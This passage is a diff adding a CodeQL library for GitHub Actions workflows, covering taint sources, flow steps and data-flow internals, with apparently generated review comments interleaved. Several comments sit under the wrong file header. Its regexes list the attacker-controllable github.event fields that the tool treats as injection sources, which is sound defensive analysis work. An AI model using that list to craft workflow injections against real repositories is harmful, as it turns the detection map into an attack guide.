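Review bot: `BooleanCompletion.isValidForSpecific` is `none()` (the condition case is left as a commented-out TODO), so no AST node ever completes with a `BooleanCompletion` and no `BooleanSuccessor` edge is produced; everything layered on those edges, `successorTypeIsCondition` here and the `ConditionBlock`/`controls` machinery in BasicBlocks.qll, is currently unpopulated, which deserves a comment on the class such as `// No Actions node yields a boolean completion yet; ConditionBlock/controls in BasicBlocks.qll stay empty until this is filled in.`. The `// Why is there no conditional successor type?` question and the block of commented-out tree classes at the end of the file read as work-in-progress notes rather than code and should be resolved or removed; the file also ends without a trailing newline. Minor: the TODO above `CfgNodeTree` reads `part ot the tree` (`of`).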
@@ -0,0 +1,137 @@ +import actions +import codeql.actions.DataFlow + +/** + * A data flow source. + */ +abstract class SourceNode extends DataFlow::Node { + /** + * Gets a string that represents the source kind with respect to threat modeling. + */ + abstract string getThreatModel(); +} + +/** A data flow source of remote user input. */ +abstract class RemoteFlowSource extends SourceNode { + /** Gets a string that describes the type of this remote flow source. */ + abstract string getSourceType(); + + override string getThreatModel() { result = "remote" } +} + +private class ChangedFilesSource extends RemoteFlowSource { + ChangedFilesSource() { + exists(UsesExpr uses | + uses.getTarget() = "tj-actions/changed-files" and + uses.getVersion() = ["v1", "v20", "v30", "v40"] and + uses = this.asExpr() + ) + } + + override string getSourceType() { result = "User-controlled list of changed files" } +} + +bindingset[context] +private predicate isExternalUserControlledIssue(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledPullRequest(string context) { + exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*title\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*body\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*label\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*default_branch\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*description\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*homepage\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*ref\\b", + "\\bgithub\\s*\\.\\s*head_ref\\b" + ] + | + 
context.regexpMatch(reg) + ) +} + +bindingset[context] +private predicate isExternalUserControlledReview(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*review\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledComment(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*comment\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledGollum(string context) { + context + .regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*page_name\\b") or + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*title\\b") +} + +bindingset[context] +private predicate isExternalUserControlledCommit(string context) { + exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + ] + | + context.regexpMatch(reg) + ) +} + +bindingset[context] +private predicate isExternalUserControlledDiscussion(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*title\\b") or + 
context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledWorkflowRun(string context) { + exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*name\\b", + ] + | + context.regexpMatch(reg) + ) +} + +private class EventSource extends RemoteFlowSource { + EventSource() { + exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | + isExternalUserControlledIssue(context) or + isExternalUserControlledPullRequest(context) or + isExternalUserControlledReview(context) or + isExternalUserControlledComment(context) or + isExternalUserControlledGollum(context) or + isExternalUserControlledCommit(context) or + isExternalUserControlledDiscussion(context) or + isExternalUserControlledWorkflowRun(context) + ) + } + + override string getSourceType() { result = "User-controlled events" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll new file mode 100644 index 000000000000..528f9e54832c --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
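Review bot: `ChangedFilesSource` only holds when `uses.getVersion()` is exactly one of `"v1"`, `"v20"`, `"v30"`, `"v40"`, so a workflow that pins `tj-actions/changed-files` to any other tag (for instance `v35` or `v41.0.0`) or to a commit SHA is silently not modelled as a source, which is how an allow-list like this goes stale. Unless restricting to those exact tags is intentional, match the action regardless of version, or at least document the choice next to the conjunct: `// Only these tags are modelled; other tags and SHA pins are not treated as sources.`. The `EventSource` regexes are consistent with each other; the trailing comma after the last element of the commit-field list in `isExternalUserControlledCommit` is worth confirming against the QL grammar, since the other lists do not have one.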
@@ -0,0 +1,31 @@
+/**
+ * Provides classes representing various flow steps for taint tracking.
+ */
+
+import actions
+private import codeql.util.Unit
+private import codeql.actions.DataFlow
+
+/**
+ * A unit class for adding additional taint steps.
+ *
+ * Extend this class to add additional taint steps that should apply to all
+ * taint configurations.
+ */
+class AdditionalTaintStep extends Unit {
+ /**
+ * Holds if the step from `node1` to `node2` should be considered a taint
+ * step for all configurations.
+ */
+ abstract predicate step(DataFlow::Node node1, DataFlow::Node node2);
+}
+
+private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep {
+ override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(UsesExpr u |
+ u.getTarget() = "mad9000/actions-find-and-replace-string" and
+ pred.asExpr() = u.getArgument(["source", "replace"]) and
+ succ.asExpr() = u
+ )
+ }
+}
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll
new file mode 100644
index 000000000000..4abb455b0ddc
--- /dev/null
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll
@@ -0,0 +1,11 @@
+/**
+ * Provides Actions-specific definitions for use in the data flow library.
+ * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/DataFlow.qll
+ */
+
+private import codeql.dataflow.DataFlow
+
+module ActionsDataFlow implements InputSig {
+ import DataFlowPrivate
+ import DataFlowPublic
+}
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
new file mode 100644
index 000000000000..b4abb3e8aa5f
--- /dev/null
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
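Review bot: `ActionsFindAndReplaceStringStep` has no doc comment, and unlike `ChangedFilesSource` in FlowSources.qll it matches `mad9000/actions-find-and-replace-string` at any version; whichever convention is intended for action-specific models, the two should follow the same one so the gap is a decision rather than an accident. A one-line doc would make the intent explicit: `/** Taint flows from the source and replace inputs of mad9000/actions-find-and-replace-string to the step's output (any version). */`.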
@@ -0,0 +1,312 @@ +private import codeql.dataflow.DataFlow +private import codeql.actions.Ast +private import codeql.actions.Cfg as Cfg +private import codeql.Locations +private import codeql.actions.controlflow.BasicBlocks +private import DataFlowPublic + +cached +newtype TNode = TExprNode(DataFlowExpr e) + +/** + * Not used + */ +class ParameterNode extends Node { + ParameterNode() { none() } +} + +/** + * Not used + */ +class ReturnNode extends Node { + ReturnNode() { none() } + + ReturnKind getKind() { none() } +} + +class OutNode extends ExprNode { + private DataFlowCall call; + + OutNode() { call = this.getCfgNode() } + + DataFlowCall getCall(ReturnKind kind) { + result = call and + kind instanceof NormalReturn + } +} + +class CastNode extends Node { + CastNode() { none() } +} + +class PostUpdateNode extends Node { + PostUpdateNode() { none() } + + Node getPreUpdateNode() { none() } +} + +predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { none() } + +predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition pos) { + arg.argumentOf(call, pos) +} + +DataFlowCallable nodeGetEnclosingCallable(Node node) { + node = TExprNode(any(DataFlowExpr e | result = e.getScope())) +} + +DataFlowType getNodeType(Node node) { any() } + +predicate nodeIsHidden(Node node) { none() } + +class DataFlowExpr extends Cfg::Node { + DataFlowExpr() { this.getAstNode() instanceof Expression } +} + +/** + * A call corresponds to a Uses steps where a 3rd party action gets called + */ +class DataFlowCall instanceof Cfg::Node { + DataFlowCall() { super.getAstNode() instanceof UsesExpr } + + /** Gets a textual representation of this element. 
*/ + string toString() { result = super.toString() } + + Location getLocation() { result = super.getLocation() } + + string getName() { result = super.getAstNode().(UsesExpr).getTarget() } + + DataFlowCallable getEnclosingCallable() { result = super.getScope() } +} + +// class DataFlowCallable instanceof Cfg::CfgScope { +// DataFlowCallable() { none() } +// +// string toString() { result = super.toString() } +// +// string getName() { result = "none" } +// } +/** + * A Cfg scope that can be called + * There are no callables in Actions, at least not in the AST + */ +class DataFlowCallable instanceof Cfg::CfgScope { + string toString() { result = super.toString() } + + Location getLocation() { result = super.getLocation() } + + string getName() { + if this instanceof StepStmt + then result = this.(StepStmt).getName() + else result = this.(JobStmt).getName() + } +} + +newtype TReturnKind = TNormalReturn() + +abstract class ReturnKind extends TReturnKind { + /** Gets a textual representation of this element. */ + abstract string toString(); +} + +class NormalReturn extends ReturnKind, TNormalReturn { + override string toString() { result = "return" } +} + +/** Gets a viable implementation of the target of the given `Call`. */ +DataFlowCallable viableCallable(DataFlowCall c) { none() } + +// /** +// * Holds if the set of viable implementations that can be called by `call` +// * might be improved by knowing the call context. +// */ +// predicate mayBenefitFromCallContext(DataFlowCall call, DataFlowCallable c) { none() } +// /** +// * Gets a viable dispatch target of `call` in the context `ctx`. This is +// * restricted to those `call`s for which a context might make a difference. +// */ +// DataFlowCallable viableImplInCallContext(DataFlowCall call, DataFlowCall ctx) { none() } +/** + * Gets a node that can read the value returned from `call` with return kind + * `kind`. 
+ */ +OutNode getAnOutNode(DataFlowCall call, ReturnKind kind) { call = result.getCall(kind) } + +private newtype TDataFlowType = TUnknownDataFlowType() + +/** + * A type for a data flow node. + * + * This may or may not coincide with any type system existing for the source + * language, but should minimally include unique types for individual closure + * expressions (typically lambdas). + */ +class DataFlowType extends TDataFlowType { + string toString() { result = "" } +} + +string ppReprType(DataFlowType t) { none() } + +bindingset[t1, t2] +predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 } + +predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } + +private newtype TContent = TNoContent() { none() } + +class Content extends TContent { + /** Gets a textual representation of this element. */ + string toString() { none() } +} + +predicate forceHighPrecision(Content c) { none() } + +newtype TContentSet = TNoContentSet() { none() } + +private newtype TContentApprox = TNoContentApprox() { none() } + +class ContentApprox extends TContentApprox { + /** Gets a textual representation of this element. 
*/ + string toString() { none() } +} + +ContentApprox getContentApprox(Content c) { none() } + +/** + * Not used since we dont have Callables in the AST + * Made a string to match the ArgumentPosition type + */ +class ParameterPosition extends string { + ParameterPosition() { none() } +} + +/** + * Made a string to match `With:` keys in the AST + */ +class ArgumentPosition extends string { + ArgumentPosition() { exists(any(UsesExpr e).getArgument(this)) } +} + +/** + * Not really used since we dont have Callables in the AST but needed for the InputSig signature + */ +predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } + +/** + * a simple local flow step + */ +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + +predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output + exists(UsesExpr uses, StepOutputAccessExpr outputRead | + uses = nodeFrom.asExpr() and + outputRead = nodeTo.asExpr() and + outputRead.getStepId() = uses.getId() and + uses.getJob() = outputRead.getJob() + ) +} + +predicate test1(UsesExpr u, string f, JobStmt j) { + u.getLocation().getFile().getBaseName() = "inter1.yml" and + f = u.getId() and + j = u.getJob() +} + +predicate test2(StepOutputAccessExpr r, string f, JobStmt j) { + r.getLocation().getFile().getBaseName() = "inter1.yml" and + f = r.getStepId() and + j = r.getJob() +} + +predicate test3(UsesExpr u, StepOutputAccessExpr r, Node n) { + r.getLocation().getFile().getBaseName() = "inter1.yml" and + u.getLocation().getFile().getBaseName() = "inter1.yml" and + u.getId() = r.getStepId() and + u.getJob() = r.getJob() and + // el SOAE has no mapping DF NODE + n.asExpr() = r +} + +predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression + exists(Expression astFrom, JobOutputAccessExpr astTo | + 
astFrom = nodeFrom.asExpr() and
+ astTo = nodeTo.asExpr() and
+ astTo.getOutputExpr() = astFrom
+ )
+}
+
+/**
+ * Holds if there is a local flow step from `nodeFrom` to `nodeTo`.
+ * For Actions, we dont need SSA nodes since it should be already in SSA form
+ * Local flow steps are always between two nodes in the same Cfg scope (job definition).
+ */
+pragma[nomagic]
+predicate localFlowStep(Node nodeFrom, Node nodeTo) {
+ stepOutputDefToUse(nodeFrom, nodeTo) or
+ jobOutputDefToUse(nodeFrom, nodeTo)
+}
+
+/**
+ * Holds if data can flow from `node1` to `node2` through a non-local step
+ * that does not follow a call edge. For example, a step through a global
+ * variable.
+ */
+predicate jumpStep(Node node1, Node node2) { none() }
+
+/**
+ * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus,
+ * `node1` references an object with a content `c.getAReadContent()` whose
+ * value ends up in `node2`.
+ */
+predicate readStep(Node node1, ContentSet c, Node node2) { none() }
+
+/**
+ * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus,
+ * `node2` references an object with a content `c.getAStoreContent()` that
+ * contains the value of `node1`.
+ */
+predicate storeStep(Node node1, ContentSet c, Node node2) { none() }
+
+/**
+ * Holds if values stored inside content `c` are cleared at node `n`. For example,
+ * any value stored inside `f` is cleared at the pre-update node associated with `x`
+ * in `x.f = newValue`.
+ */
+predicate clearsContent(Node n, ContentSet c) { none() }
+
+/**
+ * Holds if the value that is being tracked is expected to be stored inside content `c`
+ * at node `n`.
+ */
+predicate expectsContent(Node n, ContentSet c) { none() }
+
+/**
+ * Holds if the node `n` is unreachable when the call context is `call`.
+ */
+predicate isUnreachableInCall(Node n, DataFlowCall call) { none() }
+
+/**
+ * Holds if flow is allowed to pass from parameter `p` and back to itself as a
+ * side-effect, resulting in a summary from `p` to itself.
+ *
+ * One example would be to allow flow like `p.foo = p.bar;`, which is disallowed
+ * by default as a heuristic.
+ */
+predicate allowParameterReturnInSelf(ParameterNode p) { none() }
+
+predicate localMustFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) }
+
+private newtype TLambdaCallKind = TNone()
+
+class LambdaCallKind = TLambdaCallKind;
+
+/** Holds if `creation` is an expression that creates a lambda of kind `kind` for `c`. */
+predicate lambdaCreation(Node creation, LambdaCallKind kind, DataFlowCallable c) { none() }
+
+/** Holds if `call` is a lambda call of kind `kind` where `receiver` is the lambda expression. */
+predicate lambdaCall(DataFlowCall call, LambdaCallKind kind, Node receiver) { none() }
+
+/** Extra data-flow steps needed for lambda flow analysis. */
+predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preservesValue) { none() }
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
new file mode 100644
index 000000000000..41be90718d85
--- /dev/null
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
@@ -0,0 +1,78 @@
+private import codeql.dataflow.DataFlow
+private import codeql.actions.Ast
+private import codeql.actions.Cfg as Cfg
+private import codeql.Locations
+private import DataFlowPrivate
+
+class Node extends TNode {
+ /** Gets a textual representation of this element. */
+ string toString() { none() }
+
+ Location getLocation() { none() }
+
+ /**
+ * Holds if this element is at the specified location.
+ * The location spans column `startcolumn` of line `startline` to
+ * column `endcolumn` of line `endline` in file `filepath`.
+ * For more information, see
+ * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/).
+ */
+ predicate hasLocationInfo(
+ string filepath, int startline, int startcolumn, int endline, int endcolumn
+ ) {
+ this.getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn)
+ }
+
+ AstNode asExpr() { none() }
+}
+
+/**
+ * Any Ast Expression
+ * UsesExpr, RunExpr, ArgumentExpr, VarAccessExpr, ...
+ */
+class ExprNode extends Node, TExprNode {
+ private DataFlowExpr expr;
+
+ ExprNode() { this = TExprNode(expr) }
+
+ Cfg::Node getCfgNode() { result = expr }
+
+ override string toString() { result = expr.toString() }
+
+ override Location getLocation() { result = expr.getLocation() }
+
+ override AstNode asExpr() { result = expr.getAstNode() }
+}
+
+/**
+ * An argument to a Uses step (call)
+ */
+class ArgumentNode extends ExprNode {
+ ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) }
+
+ predicate argumentOf(DataFlowCall call, ArgumentPosition pos) {
+ this.getCfgNode() = call.(Cfg::Node).getAPredecessor+() and
+ call.(Cfg::Node).getAstNode() =
+ any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode())
+ }
+}
+
+/** Gets the node corresponding to `e`. */
+Node exprNode(DataFlowExpr e) { result = TExprNode(e) }
+
+/**
+ * An entity that represents a set of `Content`s.
+ *
+ * The set may be interpreted differently depending on whether it is
+ * stored into (`getAStoreContent`) or read from (`getAReadContent`).
+ */
+class ContentSet extends TContentSet {
+ /** Gets a textual representation of this element. */
+ string toString() { none() }
+
+ /** Gets a content that may be stored into when storing into this set. */
+ Content getAStoreContent() { none() }
+
+ /** Gets a content that may be read from when reading from this set. */
+ Content getAReadContent() { none() }
+}
diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll
new file mode 100644
index 000000000000..c2d51748f20f
--- /dev/null
+++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll
@@ -0,0 +1,11 @@
+/**
+ * Provides Actions-specific definitions for use in the taint tracking library.
+ * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll
+ */
+
+private import codeql.dataflow.TaintTracking
+private import DataFlowImplSpecific
+
+module ActionsTaintTracking implements InputSig {
+ import TaintTrackingPrivate
+}
diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll
new file mode 100644
index 000000000000..a7e0d23df2b4
--- /dev/null
+++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll
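Review bot: In `ArgumentNode.argumentOf`, the first conjunct `this.getCfgNode() = call.(Cfg::Node).getAPredecessor+()` is not explained and looks redundant once the second conjunct has pinned the argument to the `UsesExpr` at `call` through `e.getArgument(pos)`; if the transitive predecessor walk is meant to exclude arguments that are not CFG-reachable before the call, a one-line comment such as `// the argument's CFG node must be evaluated before the uses node it belongs to` would make that reviewable, otherwise it is just extra closure computation. The base `Node` class answers both `toString()` and `getLocation()` with `none()`, so any future branch of `TNode` (presumably defined in `DataFlowPrivate`, outside this hunk) that forgets to override them will silently print and locate as nothing; a `// every TNode branch must override toString/getLocation` note on the class would flag that expectation.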
@@ -0,0 +1,30 @@
+/**
+ * Provides modules for performing local (intra-procedural) and
+ * global (inter-procedural) taint-tracking analyses.
+ */
+
+private import DataFlowPrivate
+private import codeql.actions.DataFlow
+private import codeql.actions.dataflow.FlowSteps
+private import codeql.actions.Ast
+
+/**
+ * Holds if `node` should be a sanitizer in all global taint flow configurations
+ * but not in local taint.
+ */
+predicate defaultTaintSanitizer(DataFlow::Node node) { none() }
+
+/**
+ * Holds if the additional step from `nodeFrom` to `nodeTo` should be included
+ * in all global taint flow configurations.
+ */
+predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
+ any(AdditionalTaintStep s).step(nodeFrom, nodeTo)
+}
+
+/**
+ * Holds if taint flow configurations should allow implicit reads of `c` at sinks
+ * and inputs to additional taint steps.
+ */
+bindingset[node]
+predicate defaultImplicitTaintRead(DataFlow::Node node, DataFlow::ContentSet c) { none() }
diff --git a/ql/lib/codeql/actions/ideContextual/IDEContextual.qll b/ql/lib/codeql/actions/ideContextual/IDEContextual.qll
new file mode 100644
index 000000000000..90ce11764b58
--- /dev/null
+++ b/ql/lib/codeql/actions/ideContextual/IDEContextual.qll
@@ -0,0 +1,19 @@
+private import codeql.files.FileSystem
+
+/**
+ * Returns an appropriately encoded version of a filename `name`
+ * passed by the VS Code extension in order to coincide with the
+ * output of `.getFile()` on locatable entities.
+ */
+cached
+File getFileBySourceArchiveName(string name) {
+ // The name provided for a file in the source archive by the VS Code extension
+ // has some differences from the absolute path in the database:
+ // 1. colons are replaced by underscores
+ // 2. there's a leading slash, even for Windows paths: "C:/foo/bar" ->
+ // "/C_/foo/bar"
+ // 3. double slashes in UNC prefixes are replaced with a single slash
+ // We can handle 2 and 3 together by unconditionally adding a leading slash
+ // before replacing double slashes.
+ name = ("/" + result.getAbsolutePath().replaceAll(":", "_")).replaceAll("//", "/")
+}
\ No newline at end of file
diff --git a/ql/lib/codeql/actions/ideContextual/printAst.qll b/ql/lib/codeql/actions/ideContextual/printAst.qll
new file mode 100644
index 000000000000..f8a7c16f0712
--- /dev/null
+++ b/ql/lib/codeql/actions/ideContextual/printAst.qll
@@ -0,0 +1,137 @@
+/**
+ * Provides queries to pretty-print an Kaleidoscope abstract syntax tree as a graph.
+ *
+ * By default, this will print the AST for all nodes in the database. To change
+ * this behavior, extend `PrintASTConfiguration` and override `shouldPrintNode`
+ * to hold for only the AST nodes you wish to view.
+ */
+
+private import codeql.actions.Ast
+private import codeql.Locations
+
+/**
+ * The query can extend this class to control which nodes are printed.
+ */
+class PrintAstConfiguration extends string {
+ PrintAstConfiguration() { this = "PrintAstConfiguration" }
+
+ /**
+ * Holds if the given node should be printed.
+ */
+ predicate shouldPrintNode(PrintAstNode n) { any() }
+}
+
+newtype TPrintNode = TPrintRegularAstNode(AstNode n) { any() }
+
+private predicate shouldPrintNode(PrintAstNode n) {
+ any(PrintAstConfiguration config).shouldPrintNode(n)
+}
+
+/**
+ * A node in the output tree.
+ */
+class PrintAstNode extends TPrintNode {
+ /** Gets a textual representation of this node in the PrintAst output tree. */
+ string toString() { none() }
+
+ /**
+ * Gets the child node with name `edgeName`. Typically this is the name of the
+ * predicate used to access the child.
+ */
+ PrintAstNode getChild(string edgeName) { none() }
+
+ /** Get the Location of this AST node */
+ Location getLocation() { none() }
+
+ /** Gets a child of this node. */
+ final PrintAstNode getAChild() { result = this.getChild(_) }
+
+ /** Gets the parent of this node, if any. */
+ final PrintAstNode getParent() { result.getAChild() = this }
+
+ /** Gets a value used to order this node amongst its siblings.
*/ + int getOrder() { + this = + rank[result](PrintRegularAstNode p, Location l, File f | + l = p.getLocation() and + f = l.getFile() + | + p + order by + f.getBaseName(), f.getAbsolutePath(), l.getStartLine(), l.getStartColumn(), + l.getEndLine(), l.getEndColumn() + ) + } + + /** + * Gets the value of the property of this node, where the name of the property + * is `key`. + */ + final string getProperty(string key) { + key = "semmle.label" and + result = this.toString() + or + key = "semmle.order" and result = this.getOrder().toString() + } +} + +/** An `AstNode` in the output tree. */ +class PrintRegularAstNode extends PrintAstNode, TPrintRegularAstNode { + AstNode astNode; + + PrintRegularAstNode() { this = TPrintRegularAstNode(astNode) } + + override string toString() { + result = "[" + concat(astNode.getAPrimaryQlClass(), ", ") + "] " + astNode.toString() + } + + override Location getLocation() { result = astNode.getLocation() } + + override PrintAstNode getChild(string name) { + exists(int i | + name = i.toString() and + result = + TPrintRegularAstNode(rank[i](AstNode child, Location l | + child.getParentNode() = astNode and + child.getLocation() = l + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), + child.toString() + )) + ) + } +} + +/** + * Holds if `node` belongs to the output tree, and its property `key` has the + * given `value`. + */ +query predicate nodes(PrintAstNode node, string key, string value) { + value = node.getProperty(key) and shouldPrintNode(node) +} + +/** + * Holds if `target` is a child of `source` in the AST, and property `key` of + * the edge has the given `value`. 
+ */
+query predicate edges(PrintAstNode source, PrintAstNode target, string key, string value) {
+ shouldPrintNode(source) and
+ shouldPrintNode(target) and
+ target = source.getChild(_) and
+ (
+ key = "semmle.label" and
+ value = strictconcat(string name | source.getChild(name) = target | name, "/")
+ or
+ key = "semmle.order" and
+ value = target.getProperty("semmle.order")
+ )
+}
+
+/**
+ * Holds if property `key` of the graph has the given `value`.
+ */
+query predicate graphProperties(string key, string value) {
+ key = "semmle.graphKind" and value = "tree"
+}
diff --git a/ql/lib/codeql/files/FileSystem.qll b/ql/lib/codeql/files/FileSystem.qll
new file mode 100644
index 000000000000..552b85a4673f
--- /dev/null
+++ b/ql/lib/codeql/files/FileSystem.qll
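Review bot: The file header still says this module pretty-prints a `Kaleidoscope` abstract syntax tree, a leftover from whatever language library it was adapted from; it should read `Provides queries to pretty-print a GitHub Actions abstract syntax tree as a graph.` so readers are not sent looking for a non-existent Kaleidoscope extractor. Separately, in `PrintRegularAstNode.getChild` the `order by` clause lists `l.getEndColumn(), l.getEndLine()` in that order, while `getOrder` on the base class sorts end line before end column; unless the inversion is deliberate it should be `l.getEndLine(), l.getEndColumn()` so siblings that share a start position are ranked consistently between the two predicates. The `getOrder` rank also ranges over every `PrintRegularAstNode` in the database rather than the node's siblings, which is probably fine for ordering but worth a comment since the predicate doc says "amongst its siblings".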
@@ -0,0 +1,177 @@ +/** Provides classes for working with files and folders. */ + +private import codeql.Locations + +/** A file or folder. */ +abstract class Container extends @container { + /** Gets a file or sub-folder in this container. */ + Container getAChildContainer() { this = result.getParentContainer() } + + /** Gets a file in this container. */ + File getAFile() { result = this.getAChildContainer() } + + /** Gets a sub-folder in this container. */ + Folder getAFolder() { result = this.getAChildContainer() } + + /** + * Gets the absolute, canonical path of this container, using forward slashes + * as path separator. + * + * The path starts with a _root prefix_ followed by zero or more _path + * segments_ separated by forward slashes. + * + * The root prefix is of one of the following forms: + * + * 1. A single forward slash `/` (Unix-style) + * 2. An upper-case drive letter followed by a colon and a forward slash, + * such as `C:/` (Windows-style) + * 3. Two forward slashes, a computer name, and then another forward slash, + * such as `//FileServer/` (UNC-style) + * + * Path segments are never empty (that is, absolute paths never contain two + * contiguous slashes, except as part of a UNC-style root prefix). Also, path + * segments never contain forward slashes, and no path segment is of the + * form `.` (one dot) or `..` (two dots). + * + * Note that an absolute path never ends with a forward slash, except if it is + * a bare root prefix, that is, the path has no path segments. A container + * whose absolute path has no segments is always a `Folder`, not a `File`. + */ + abstract string getAbsolutePath(); + + /** + * Gets the base name of this container including extension, that is, the last + * segment of 